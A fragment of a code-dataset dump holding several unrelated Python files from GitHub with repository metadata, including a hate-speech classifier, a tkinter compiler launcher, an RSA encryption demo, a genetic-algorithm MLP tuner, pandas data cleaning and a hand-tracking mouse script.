save_tags)\nsave_tags.close()\nprint(\"pickle of tweet_tags is made\")\n\n\npos_vectorizer = TfidfVectorizer(\n tokenizer=None,\n lowercase=False,\n preprocessor=None,\n ngram_range=(1, 3),\n stop_words=None,\n use_idf=False,\n smooth_idf=False,\n norm=None,\n decode_error='replace',\n max_features=5000,\n min_df=5,\n max_df=0.75,\n)\n\n\npos = pos_vectorizer.fit_transform(tweet_tags).toarray()\npos_vocab = {v:i for i, v in enumerate(pos_vectorizer.get_feature_names())}\nfeature_name_pos=[]\nfor k,v in pos_vocab.items():\n feature_name_pos.append(k)\n\n\nLR_pos=LogisticRegression(class_weight=\"balanced\",penalty=\"l1\",C=0.01).fit(pos,np.reshape(target, target.shape[0]))\nselect2=SelectFromModel(LR_pos,prefit=True)\ny=select2.transform(pos)\n\n\n\n\nsave_pos = open(\"pos.pickle\", 'wb')\npickle.dump(pos, save_pos)\nsave_pos.close()\npprint(\"Pos_vectorizer has been pickled\")\n\n\n\n\nsentiment_analyzer = vs()\n\n\ndef more_feats(sent):\n text = cleaner.basic_cleaning( sent )\n sentiment = sentiment_analyzer.polarity_scores( sent )\n syllables = textstat.syllable_count( text )\n avg_syl_per_word = (0.001 + float( syllables )) / float( 0.001 + len( word_tokenize( text ) ) )\n num_terms = len( sent.split() )\n num_words = len( text.split() )\n num_unique_words = len( set( text.split() ) )\n num_char = len( text )\n total_char = len( sent )\n sent = cleaner.preprocessing_stage2( sent )\n urlcount = sent.count( \"URLHERE\" )\n mention = sent.count( \"MENTIONHERE\" )\n hashtags = sent.count( \"HASHTAGHERE\" )\n is_retweet = (\"RT\" in text)\n FKRA = round( float( 0.39 * float( num_words ) / 1.0 ) + float( 11.8 * avg_syl_per_word ) - 15.59, 1 )\n FRE = round( 206.835 - 1.015 * (float( num_words ) / 1.0) - (84.6 * float( avg_syl_per_word )), 2 )\n\n info_features = [FKRA, FRE, syllables, avg_syl_per_word, num_char, total_char, num_terms,\n num_words, num_unique_words, sentiment['neg'], sentiment['pos'], sentiment['neu'],\n sentiment['compound'],\n hashtags, mention, urlcount, is_retweet]\n return info_features\n\n\ndef get_feature_array(doc):\n feats = []\n i = 0\n for t in doc:\n feats.append( more_feats( t ) )\n \n return np.array( feats )\n\n\n\nextras = get_feature_array( doc2 )\nextras_f = open( \"extrafeats.pickle\", \"wb\" )\npickle.dump( extras, extras_f )\nextras_f.close()\nprint( \"Extras has been pickled\" )\n\n# extras_f = open(\"extrafeats.pickle\", 'rb')\n# extras = pickle.load(extras_f)\n# extras_f.close()\n\n\n\nM = np.concatenate([x, y, extras, target], axis=1 )\n\nprint( \"shape of M: \",M.shape )\n\n\n\nnp.random.shuffle(M )\ny = np.reshape(M[:,-1],M.shape[0])\n\n\nx_train= M[:int( M.shape[0] * 0.7 ),:-1]\nx_test= M[int( M.shape[0] * 0.7 ):, :-1]\n\ny_train= y[: int(y.shape[0]*0.7)]\ny_test= y[int(y.shape[0]*0.7):]\n\n\n\n\n\nRFclassifier = RandomForestClassifier( n_estimators=90, max_features=0.65, min_samples_leaf=12, bootstrap=True, n_jobs=2 )\nRFclassifier.fit(x_train,y_train)\n#pickle RFclassifier\nsave_rfc = open(\"RF_pickle.pickle\", \"wb\")\npickle.dump(RFclassifier, save_rfc)\nsave_rfc.close()\nprint(\"RFclassifier has been pickled\")\n\ny_pred_rfc = RFclassifier.predict(x_test)\naccuracyRF= find_accuracy(y_test, y_pred_rfc)\nprecisionRF= precision_recall_fscore_support(y_test, y_pred_rfc, average='weighted')[0]\nprint(\"Accuracy of Random forest is : \", accuracyRF)\n\n\n\n\n\n\n\nsvmclassifier = LinearSVC(class_weight='balanced',C=0.01, penalty='l2', loss='squared_hinge',multi_class='ovr')\nsvmclassifier.fit( x_train, y_train)\n#pickle SVMclassifier\nsave_classifier = open(\"svm_pickle.pickle\", \"wb\")\npickle.dump(svmclassifier, save_classifier)\nsave_classifier.close()\n\ny_pred_svm = svmclassifier.predict(x_test)\naccuracySVM= find_accuracy(y_test, y_pred_svm)\nprecisionSVM= precision_recall_fscore_support(y_test, y_pred_svm, average='weighted')[0]\nprint(\"Accuracy of SVM is : \", accuracySVM)\n\n\n\n\nLRclassifier= LogisticRegression(class_weight='balanced',penalty=\"l2\",C=0.01)\nLRclassifier.fit(x_train, y_train)\n#pickle LRclassifier\nsave_classifier = open(\"LR_pickle.pickle\", \"wb\")\npickle.dump(LRclassifier, save_classifier)\nsave_classifier.close()\n\n\ny_pred_lr = LRclassifier.predict(x_test)\naccuracyLR= find_accuracy(y_test, y_pred_lr)\nprecisionLR= precision_recall_fscore_support(y_test, y_pred_lr, average='weighted')[0]\nprint(\"Accuracy of Logistic Regression is : \", accuracyLR)\n\n\n\n\n\n\nngram_indices=select1.get_support(indices=True)\nngram_features=[feature_name_tfidf[i] for i in ngram_indices]\nnew_vocab_tfidf={v:i for i,v in enumerate(ngram_features)}\nidf_vals_ = []\nfor i in ngram_indices:\n idf_vals_.append(idf_vals[i])\n\n\nnew_vectorizer = TfidfVectorizer(\n ngram_range=(1, 3),\n stop_words=l_stop, \n use_idf=False,\n smooth_idf=False,\n norm=None, \n decode_error='replace',\n min_df=1,\n max_df=1.0,\n vocabulary=new_vocab_tfidf\n )\n\n\n\n\ntfidf_=new_vectorizer.fit(features)\n\n\n\n\n\npos_indices=select2.get_support(indices=True)\npos_features=[feature_name_pos[i] for i in pos_indices]\nnew_pos={v:i for i, v in enumerate(pos_features)}\n\n\nnew_pos_vectorizer = TfidfVectorizer(\n ngram_range=(1, 3),\n stop_words=None, \n use_idf=False,\n smooth_idf=False,\n norm=None, \n decode_error='replace',\n min_df=1,\n max_df=1.0,\n vocabulary=new_pos\n )\n\npos_ = new_pos_vectorizer.fit(tweet_tags)\n\n\n\n\nsent=\"give any sentence\"\nmy_classifier= voted_classifier(RFclassifier,svmclassifier,LRclassifier)\nans= my_classifier.predict_type(sent)\nprint(ans)\n\n\n\n\n\n\n","repo_name":"shrutiag95/Automated-Cyber-Hate-Detection-Through-Machine-Learning-And-Natural-Language-Processing","sub_path":"python-files/first level classification.py","file_name":"first level classification.py","file_ext":"py","file_size_in_byte":9890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38046096098","text":"from tkinter import *\nimport COMPILER as c, os\nfrom subprocess import Popen\n\nclass rootMenu:\n def __init__(self,master):\n self.frame = Frame(master)\n self.load = Button(self.frame, text='Load File', command=self.loadFile)\n self.save = Button(self.frame, text='Save File', command=self.saveFile)\n self.submit = Button(self.frame, text='Compile KerbalSpace\\nto Python', command=self.compiler)\n self.exe = Button(self.frame, text='Run in IDLE', command=self.exe)\n self.run = Button(self.frame, text='Run in CMD', command=self.run)\n for y in [\"frame\",\"load\",\"save\",\"submit\",\"exe\",\"run\"]:\n exec(\"self.\"+str(y)+\".pack(fill=BOTH,expand=True)\")\n \n def loadFile(self):\n self.lFile = filedialog.askopenfilename(filetypes=((\"KerbalSpace files\", \"*.ks\"),\n (\"All files\", \"*.*\")))\n def saveFile(self):\n self.sFile = filedialog.asksaveasfilename(filetypes=((\"Python files\", \"*.py\"),\n (\"All files\", \"*.*\")))\n def compiler(self):\n c.compiler(self.lFile,self.sFile)\n\n def exe(self):\n bat = open(self.sFile)\n a = bat.read()\n exec(a)\n bat.close()\n\n def run(self):\n bat = open('RUNTIME.bat','w')\n bat.write('python '+self.sFile+'\\npause\\n')\n bat.close()\n p = Popen(\"RUNTIME.bat\")\n stdout, stderr = p.communicate()\n os.remove('RUNTIME.bat')\n\ndef window(x,y,self=0):\n exec(\"{1}=Tk()\\n{1}.wm_title('{0}')\\nmenu={1}Menu({1})\\n{1}.mainloop()\".format(str(x),str(y)))\n\nwindow('Selection Menu', 'root')\n","repo_name":"StardustGogeta/Math-Programming","sub_path":"Python/Unfinished/KerbalSpace/Converter Window.py","file_name":"Converter Window.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16647562962","text":"class Solution(object):\n def reorderLogFiles(self, logs):\n \"\"\"\n :type logs: List[str]\n :rtype: List[str]\n \"\"\"\n res = []\n digit = []\n letter = []\n for log in logs:\n if (log.split(\" \")[1][0]).isnumeric():\n digit.append(log)\n else:\n letter.append(log)\n \n def sortKey(l):\n return l.split(\" \")[1:]\n \n letter.sort(key = sortKey)\n return letter + digit","repo_name":"ny215/LeetcodeExercise","sub_path":"String/937. Reorder Log Files.py","file_name":"937. Reorder Log Files.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24075911964","text":"#-----------------Public Key Encryption--------------\r\n\r\nfrom Crypto.Cipher import PKCS1_OAEP\r\nfrom Crypto.PublicKey import RSA\r\nfrom binascii import hexlify\r\n\r\nfile_name='Test.txt'\r\nwith open(file_name,'w') as f:\r\n f.write(\"Public and Private key encryption\")\r\nwith open(file_name,'rb') as f:\r\n mssg=f.read()\r\n\r\nprint(mssg)\r\n# generating private key of length of 1024 bits\r\nprivate_key=RSA.generate(1024)\r\n# generating the public key from private key\r\npublic_key=private_key.publickey()\r\n\r\n# private_key and public_key are RSA Key objects .Now converting them to strings\r\nprivate_key_str= private_key.export_key().decode()\r\npublic_key_str= public_key.export_key().decode()\r\n\r\n#writing the public and private keys to .pem files\r\nwith open('private_key.pem','w') as pr:\r\n pr.write(private_key_str)\r\nwith open('public_key.pem','w') as pr:\r\n pr.write(public_key_str)\r\n\r\n# importing keys from pem files and converting to RSA key objects\r\npr_key=RSA.import_key(open('private_key.pem','r').read())\r\npu_key=RSA.import_key(open('public_key.pem','r').read())\r\n\r\n# encryption part\r\ncipher= PKCS1_OAEP.new(key=public_key)\r\ncipher_text= cipher.encrypt(mssg)\r\nprint((cipher_text))\r\n\r\n#decryption part\r\ndecrypt_cipher=PKCS1_OAEP.new(key=private_key)\r\ndecrypt_mssg=decrypt_cipher.decrypt(cipher_text)\r\nprint(decrypt_mssg)\r\n\r\n","repo_name":"nalin2002/Cryptography-Encryptions","sub_path":"ASymm_Encryption.py","file_name":"ASymm_Encryption.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43893518481","text":"\"\"\"add-shared-policy\n\nRevision ID: 2821c95ce276\nRevises: 6834e544e667\n\n\"\"\"\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = '2821c95ce276'\ndown_revision = '6834e544e667'\n\n\ndef upgrade():\n op.add_column(\n 'auth_policy',\n sa.Column('shared', sa.Boolean, server_default='false', nullable=False),\n )\n\n\ndef downgrade():\n op.drop_column('auth_policy', 'shared')\n","repo_name":"wazo-platform/wazo-auth","sub_path":"wazo_auth/database/alembic/versions/2821c95ce276_add_shared_policy.py","file_name":"2821c95ce276_add_shared_policy.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"22691239933","text":"import functools\nimport math\n\ndef tongCS(n):\n res = 0\n while n > 0:\n res += n % 10\n n //= 10\n return res\n\ndef cmp(a, b):\n if tongCS(a) != tongCS(b):\n if tongCS(a) < tongCS(b):\n return -1\n return 1\n else:\n if a < b:\n return -1\n return 1\n\ndef TC():\n n = int(input())\n a = [int(x) for x in input().split()]\n a = sorted(a, key = functools.cmp_to_key(cmp))\n for i in a:\n print(i, end = \" \")\n print()\n\nt = 1\nt = int(input())\nfor i in range(t): TC()\n\n\n\n\n\n\n","repo_name":"nguyenvantu11052002/Python-PTIT","sub_path":"PY02023 - SẮP XẾP THEO TỔNG CHỮ SỐ.py","file_name":"PY02023 - SẮP XẾP THEO TỔNG CHỮ SỐ.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18389978263","text":"# coding:utf-8\n\"\"\"\n使用遗传算法的神经网络\n寻找超参数的最优解\n\ncross_ration:交叉概率\nmutate_ration:个体突变的概率\niteration:生成的循环数\n\nindividual:一组设计变量\npopulation:当前一代的人口\noffspring:下一代种群\nfitness:适应度\nselection:从当前一代到下一代的选择\ncrossover:两个个体之间基因的交叉/交叉\nmutation: 突变\n\n1. 初始设置\n2. 评估\n3. 选择\n4. 交叉\n5. 突变\n\n\"\"\"\n\nimport random\nfrom deap import base, creator, tools\nimport matplotlib.pyplot as plt\nimport mlp\nimport test\n\n\ndef genAlg(population=5, cross_ration=0.5, mutate_ration=0.2, iteration=5):\n \"\"\"\n cross_ration: 交叉概率\n mutate_ration: 突变概率\n iteration: 迭代次数\n \"\"\"\n random.seed(64)\n pop = toolbox.population(n=population)\n\n print(\"start of evolution\")\n\n # 评估初始种群中的个体\n fitnesses = list(map(toolbox.evaluate, pop))\n for ind, fit in zip(pop, fitnesses):\n ind.fitness.values = fit\n\n print(\" %i invalid \" % len(pop))\n\n best_fitness = []\n # 进化开始\n for g in range(iteration):\n print(\" -- %i gen --\" % g)\n\n \"\"\" 选择 \"\"\"\n offspring = toolbox.select(pop, len(pop))\n offspring = list(map(toolbox.clone, offspring))\n\n \"\"\" 交叉 \"\"\"\n for child1, child2 in zip(offspring[::2], offspring[1::2]):\n if random.random() < cross_ration:\n toolbox.mate(child1, child2)\n # 去除交叉个体的适应度\n del child1.fitness.values\n del child2.fitness.values\n \n \"\"\" 变异 \"\"\"\n for mutant in offspring:\n if random.random() < mutate_ration:\n toolbox.mutate(mutant)\n del mutant.fitness.values\n\n try:\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\n fitnesses = map(toolbox.evaluate, invalid_ind)\n for ind, fit in zip(invalid_ind, fitnesses):\n ind.fitness.values = fit\n except AssertionError:\n pass\n \n print(\" %i invalid \" % len(invalid_ind))\n\n # 下一代\n pop[:] = offspring\n # 适应度\n try:\n fits = [ind.fitness.values[0] for ind in pop]\n\n length = len(pop)\n mean = sum(fits)/length\n sum2 = sum(x*x for x in fits)\n std = abs(sum2 / length - mean**2)**0.5\n\n print(\" Min %s\" % min(fits))\n print(\" Max %s\" % max(fits))\n print(\" Avg %s\" % mean)\n print(\" Std %s\" % std)\n except IndexError:\n pass\n \n print(\"-- iteration end -- \")\n\n best_ind = tools.selBest(pop, 1)[0]\n print(\" best individual %s %s \" % (best_ind, best_ind.fitness.values))\n\n return best_ind\n\ndef run_mlp(bounds):\n _mlp = mlp.MLP(dense1=bounds[0],\n dense2=bounds[1],\n drop1=bounds[2],\n drop2=bounds[3],\n batch_size=bounds[4],\n activation=bounds[5],\n opt=bounds[6]\n )\n\n mnist_evaluation = _mlp.mlp_evaluate()\n \n return mnist_evaluation[0],\n \n\n\"\"\" define Genetic Algorithm \"\"\"\n\ncreator.create('FitnessMax', base.Fitness, weights=(-1.0,))\ncreator.create('Individual', list, fitness= creator.FitnessMax)\n\n# defining attributes for individual\ntoolbox = base.Toolbox()\n\n# 定义生成每个参数的函数\n# neuron size\ntoolbox.register(\"dense1\",random.choice, (32, 64, 128, 256, 512, 1024))\ntoolbox.register(\"dense2\", random.choice, (32, 64, 128, 256, 512, 1024))\n\n# dropout late\ntoolbox.register(\"drop1\", random.uniform, 0.2, 0.5)\ntoolbox.register(\"drop2\", random.uniform, 0.2, 0.5)\n\n# training\n# toolbox.register(\"batch_size\", random.choice, (16, 32, 64, 128, 256, 512))\ntoolbox.register(\"batch_size\", random.choice, (16, 32, 64, 128, 256, 512))\ntoolbox.register(\"activation\", random.choice, ('sigmoid','relu'))\ntoolbox.register(\"optimizer\", random.choice, ('RMSprop','SGD1','SGD2','Adam'))\n\n# register attributes to individual\ntoolbox.register('individual', tools.initCycle, creator.Individual,\n (toolbox.dense1, toolbox.dense2,\n toolbox.drop1, toolbox.drop2,\n toolbox.batch_size, toolbox.activation, toolbox.optimizer),\n n = 1)\n\n# individual to population\ntoolbox.register('population', tools.initRepeat, list, toolbox.individual)\n\n# 交叉定义\ntoolbox.register('mate', tools.cxTwoPoint)\n# 变异定义\ntoolbox.register('mutate', tools.mutFlipBit, indpb = 0.05)\n# 选择定义\ntoolbox.register('select', tools.selTournament, tournsize=3)\n\ntoolbox.register('evaluate', run_mlp)\n\nbest_int = genAlg(population=5, cross_ration=0.5, mutate_ration=0.2, iteration=50)\n\n\n","repo_name":"polyudsa/AI","sub_path":"mlp-ga/mlp_ga.py","file_name":"mlp_ga.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29564014907","text":"# This script copies the contents from one file to another\n\nimport sys\n\nfromfile = input(\"Enter the File from which the contents needs to be copied : \")\ntofile = input(\"Enter the File to which the contest needs to be copied : \")\n\n# Assign object to read the files\n\nreadfile = open(fromfile , 'r+')\ndata = readfile.read()\nreadfile.close()\n\nwritefile = open(tofile , 'w+')\nwritefile.write(data)\nwritefile.close()\n","repo_name":"darshanchandran/PythonProject","sub_path":"PythonProject/Python programming/learning/copypaste.py","file_name":"copypaste.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33845932697","text":"import time\n\n\nclass Solution:\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n if not nums:\n return []\n res = []\n\n def dfs(nums, path):\n if not nums:\n res.append(path)\n return\n\n for i in range(len(nums)):\n dfs(nums[:i] + nums[i + 1:], path + [nums[i]])\n\n dfs(nums, [])\n return res\n\n\nif __name__ == \"__main__\":\n nums = [1, 2, 3]\n start = time.time()\n solution = Solution()\n print(solution.permute(nums))\n end = time.time()\n print(\"runtime = \", end - start)\n","repo_name":"simplynaive/LeetCode","sub_path":"46. Permutations.py","file_name":"46. Permutations.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28519022540","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 22 10:20:16 2022\r\n\r\n@author: PascalDupontBrussels\r\nAnaconda Spyder\r\n\"\"\"\r\n\r\nimport pandas as pd\r\n\r\n#file_name = pd.read_csv('file.csv') <-- format of read_csv\r\n#data = pd.read_csv('transaction.csv')\r\ndata = pd.read_csv('transaction.csv', sep=';')\r\n\r\n#Summary of the data \r\ndata.info()\r\n\r\n#working with calulations\r\n#Defining variables\r\n\r\nCostPerItem = 11.73\r\nSellingPricePerItem = 21.11\r\nNumberOfItemPurchased = 6\r\n\r\n#Mathematical Operation on Tableau\r\nProfitPerItem = 21.11 - 11.73\r\nProfitPerItem = SellingPricePerItem - CostPerItem\r\n\r\nProfitBytransaction = ProfitPerItem * NumberOfItemPurchased\r\nCostPerTransaction = CostPerItem * NumberOfItemPurchased\r\nSellingPriceperTransaction = SellingPricePerItem * NumberOfItemPurchased\r\n\r\n#Costpertransaction Column calculation\r\n#CostPertransaction = CostPeritem * NumberofitemsPurchases\r\n#variable = dataframe['column_name] \r\nCostPerItem = data['CostPerItem'] \r\nNumberOfItemsPurchased = data['NumberOfItemsPurchased']\r\nCostPerTransaction = NumberOfItemsPurchased * CostPerItem\r\n\r\nSellingPricePerItem = data['SellingPricePerItem']\r\n\r\n#Adding a column to a dataframe\r\ndata['CostPerTransaction'] = CostPerTransaction\r\n\r\n#Sales per transaction\r\ndata['SalesPerTransaction'] = data['SellingPricePerItem'] * data['NumberOfItemsPurchased']\r\n\r\n#Profit Calulation = Sales - Cost\r\ndata['ProfitByTransaction'] = data['SalesPerTransaction'] - data['CostPerTransaction']\r\n\r\n#Markup = (Sales- Cost)/ cost\r\n#data['Markup'] = (data['SalesPerTransaction'] - data['CostPerTransaction']) / data['CostPerTransaction']\r\ndata['Markup'] = data['ProfitByTransaction'] / data['CostPerTransaction']\r\n\r\n#data.info()\r\n#Rouding Marking\r\n#roundmarkup = round(data['Markup'],2)\r\ndata['Markup'] = round(data['Markup'],2)\r\n\r\n#Combining data Fields\r\n\r\nmyname = 'Pascal ' + 'Dupont'\r\nmy_date = 'day' + '-' + 'month' + '-' + 'year'\r\nmy_date = data['Day'] + data['Month'] + data['Year'] #not working int+str\r\n\r\n#Checking columnsdata type\r\nprint(data['Day'].dtype) \r\n\r\n#Change Column Type\r\nday = data['Day'].astype(str)\r\nyear = data['Year'].astype(str)\r\n\r\nprint(year.dtype) \r\n\r\nmy_date = day + '-' + data['Month'] + '-' + year\r\n\r\n#Add a new column date in our data\r\ndata['date'] = my_date\r\n\r\n#Using iloc to view specific columns/rows\r\n\r\ndata.iloc[0] # views the row with index 0\r\ndata.iloc[3] # views row 3\r\ndata.iloc[0:5] # views first 5 row\r\ndata.iloc[-4:] # views the four last rows\r\ndata.head(5) # brings in first 5 rows\r\ndata.iloc[:,2] # all rows column 2\r\ndata.iloc[4,2] # row 4 column 2\r\n\r\n#Using Split to split the ClientKeywords Field\r\n#new_var = column.str.split('sep', expand = True)\r\nsplit_col = data['ClientKeywords'].str.split(',', expand = True)\r\n\r\n#Creating new columns forthe split columns in ClientKeywords\r\ndata['ClientAge'] = split_col[0]\r\ndata['ClientType'] = split_col[1]\r\ndata['LengthOfContract'] = split_col[2]\r\n\r\n#Using the replace function\r\ndata['ClientAge'] = data['ClientAge'].str.replace('[', '') \r\ndata['LengthOfContract'] = data['LengthOfContract'].str.replace(']', '') \r\n\r\ndata['ClientAge'] = data['ClientAge'].str.replace(\"'\", '')\r\ndata['ClientType'] = data['ClientType'].str.replace(\"'\", '') \r\ndata['LengthOfContract'] = data['LengthOfContract'].str.replace(\"'\", '')\r\n\r\n#Using the lower function itemsto lowercase\r\ndata['ItemDescription'] = data['ItemDescription'].str.lower()\r\n\r\n#How to Merge files\r\n#Bringing a new dataset\r\nseason = pd.read_csv('value_inc_seasons.csv', sep=';')\r\n\r\n#Merging files: merge_dataframe = pd.merge(old_dataframe, new_dataframe, on = 'key'. (here->Month))\r\ndata = pd.merge(data, season, on ='Month')\r\n\r\n#Dropping Columns\r\n#dataframe = dataframe.drop('columns name' , axis =1)\r\n#dataframe = dataframe.drop(['columns name1', 'columns name2', 'columns name3'] , axis =1)\r\ndata = data.drop('Year', axis = 1)\r\ndata = data.drop(['Month', 'Day', 'ClientKeywords'], axis = 1)\r\n\r\n#Export into a .csv\r\ndata.to_csv('ValueInc_Cleaned.csv', index = False)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"PascalDupontBrussels/PortfolioProjects","sub_path":"Python_Tableau_Analysis/valueinc_sales.py","file_name":"valueinc_sales.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42517564731","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport mdconf_oop as md\n\ndef read_xvg_file(file_name) :\n x = []\n y = []\n with open(file_name) as f:\n for line in f:\n cols = line.split()\n if len(cols) == 2 and cols[0][0] != '@':\n x.append(float(cols[0]))\n y.append(float(cols[1]))\n return x, y\n\n# Water-vapourt surface tension\ngamma = 5.78e-2 # Pa*m\n# Avogadro's number\nN_A = 6.02214076e23 # mol^-1\n\nlabel = ['00', '01', '02', '03', '04', '05', '06']\na = np.linspace(0.0, 0.7, 8)\n\nxvg_res = []\nxvg_sol = []\ngro_init_res = []\ngro_fin_res = []\nfor l in label :\n xvg_res.append('/home/michele/python_for_md/FreeEnergyCorrugate/FE'+l+'_res/dhdl.xvg')\n xvg_sol.append('/home/michele/python_for_md/FreeEnergyCorrugate/FE'+l+'_sol/dhdl.xvg')\n gro_init_res.append('/home/michele/python_for_md/FreeEnergyCorrugate/FE'+l+'_res/init_conf.gro')\n gro_fin_res.append('/home/michele/python_for_md/FreeEnergyCorrugate/FE'+l+'_res/confout.gro')\n\nconf_init = md.Configuration()\nconf_init.input(gro_init_res[0])\nconf_fin = md.Configuration()\nconf_fin.input(gro_fin_res[0])\nLy = (conf_init.box_yy)*1e-9\nLx0 = (conf_init.box_xx)*1e-9\nLx1 = (conf_fin.box_xx)*1e-9\ndiff_H_sur = [ (2.0*N_A*gamma*Ly*(Lx1-Lx0))*1e-3, ]\n\ntheta_0 = 37.8\ndelta_F_wet_dry = -2.0*N_A*gamma*np.cos(np.deg2rad(theta_0))*Ly*Lx0*1e-3\n\nk_example = 4\n\nfor k in range(1, len(label)) :\n conf_init.input(gro_init_res[k])\n conf_fin.input(gro_fin_res[k])\n Lx0 = (conf_init.box_xx)*1e-9\n Lx1 = (conf_fin.box_xx)*1e-9\n diff_H_sur.append( (2.0*N_A*gamma*Ly*(Lx1-Lx0))*1e-3 )\n\nt, _ = read_xvg_file( xvg_res[0] )\nlam = np.array(t) / max(t)\ndl = lam[1]-lam[0]\n\nfig1, (ax1, ax2) = plt.subplots(1, 2)\n\ndiff_H_res = []\nfor k in range(len(label)) :\n _, dhdl_avg = read_xvg_file( xvg_res[k] )\n delta_h = dl*np.cumsum(dhdl_avg)\n diff_H_res.append(delta_h[-1])\n if k == k_example :\n ax1.plot(t, dhdl_avg, 'g-', linewidth=0.25)\n ax1.plot(t, np.zeros(len(t)), 'k--', linewidth=2.5)\n ax1.plot(t, delta_h, 'r-', linewidth=2.5, label=r'integral over $d\\lambda$')\n ax1.set_title('Dry', fontsize=35.0)\n ax1.set_xlabel('$t$ [ps]', fontsize=25.0)\n ax1.set_ylabel(r'$$ [kJ/mol]', fontsize=25.0)\n ax1.legend(fontsize=25.0)\n ax1.tick_params(axis='x', labelsize=20.0)\n ax1.tick_params(axis='y', labelsize=20.0)\n y_min = min(dhdl_avg)\n y_max = max(dhdl_avg)\n\ndiff_H_sol = []\nfor k in range(len(label)) :\n _, dhdl_avg = read_xvg_file( xvg_sol[k] )\n delta_h = dl*np.cumsum(dhdl_avg)\n diff_H_sol.append(delta_h[-1])\n if k == k_example :\n ax2.plot(t, dhdl_avg, 'c-', linewidth=0.25)\n ax2.plot(t, np.zeros(len(t)), 'k--', linewidth=2.5)\n ax2.plot(t, delta_h, 'r-', linewidth=2.5)\n ax2.set_title('Wet', fontsize=35.0)\n ax2.set_xlabel('$t$ [ps]', fontsize=25.0)\n ax2.tick_params(axis='x', labelsize=20.0)\n ax2.tick_params(axis='y', labelsize=20.0)\n y_min = min( y_min, min(dhdl_avg))\n y_max = max( y_max, max(dhdl_avg))\n ax1.set_xlim([0.0, max(t)])\n ax1.set_ylim([y_min, y_max])\n ax2.set_xlim([0.0, max(t)])\n ax2.set_ylim([y_min, y_max])\n\nplt.show()\n\ndiff_H_sol.insert(0, 0.0)\ndiff_H_res.insert(0, 0.0)\ndiff_H_sur.insert(0, 0.0)\n\ndiff_H_sol = np.array(diff_H_sol)\ndiff_H_res = np.array(diff_H_res)\ndiff_H_sur = np.array(diff_H_sur)\n\ndiff_H_ws = diff_H_sol - diff_H_res - diff_H_sur\n\nplt.plot(a, diff_H_sol, 'ko-.', linewidth=1.5, markersize=10.0, label='total')\nplt.plot(a, diff_H_res, 'gs-.', linewidth=1.5, markersize=10.0, label='pos. res.')\nplt.plot(a, diff_H_sur, 'bx-.', linewidth=1.5, markersize=10.0, label='liquid/vapour')\nplt.plot(a, diff_H_ws, 'rD-.', linewidth=3.0, markersize=15.0, label='excess')\nplt.plot([0.0, 0.75], [delta_F_wet_dry, delta_F_wet_dry], 'm--', linewidth=3.0, label=r'$\\delta$ wet-dry')\nplt.title('Free energy analysis', fontsize=35.0)\nplt.legend(fontsize=25.0)\nplt.xlim(0.0, 0.75)\nplt.xticks(fontsize=20.0)\nplt.yticks(fontsize=20.0)\nplt.ylabel('$\\Delta F$ [kJ/mol]', fontsize=25.0)\nplt.xlabel('$a=hk$ [-1]', fontsize=25.0)\nplt.show()\n","repo_name":"MicPellegrino/python_for_md","sub_path":"free_energy_analysis.py","file_name":"free_energy_analysis.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"524636388","text":"import unittest\nclass DEVISION(unittest.TestCase):\n def setUp(self):\n print('********************除法运算,开始啦*************************')\n\n\n def test_chuQ(self):\n '''除法运算7'''\n a = 10\n b = 5\n result = a / b\n ex = 2\n self.assertEqual(result, ex)\n\n def test_chuq(self):\n '''除法运算8'''\n a = 10\n b = 6\n result = a / b\n ex = 2\n self.assertEqual(result, ex)\n\n def tearDown(self):\n print('----------------------除法运算,结束啦-------------------------------------')\n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"chenk678/python-","sub_path":"testcase/testc10.py","file_name":"testc10.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16990562171","text":"import cv2\nimport handTrackingModule as htm\nimport numpy as np\nimport autopy\nimport time\nfrom autopy.key import *\nfrom autopy import *\n\n\ndef moveMouse():\n global prevX, prevY, currY, currX, x3, y3, x1, y1\n x3 = np.interp(x1, (0, frameReducedW), (0, wScr))\n y3 = np.interp(y1, (frameReducedH, heightCap - frameReducedH), (0, hScr))\n currX = prevX + (x3 - prevX) / smoothen\n currY = prevY + (y3 - prevY) / smoothen\n try:\n autopy.mouse.move(wScr - currX, currY)\n except ValueError:\n pass\n prevX, prevY = currX, currY\n\n\nwidthCap = 640\nheightCap = 480\ncapture = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n# capture.set(cv2.CAP_PROP_FPS, 30)\ncapture.set(3, widthCap)\ncapture.set(4, heightCap)\nprevTime = 0\ndetector 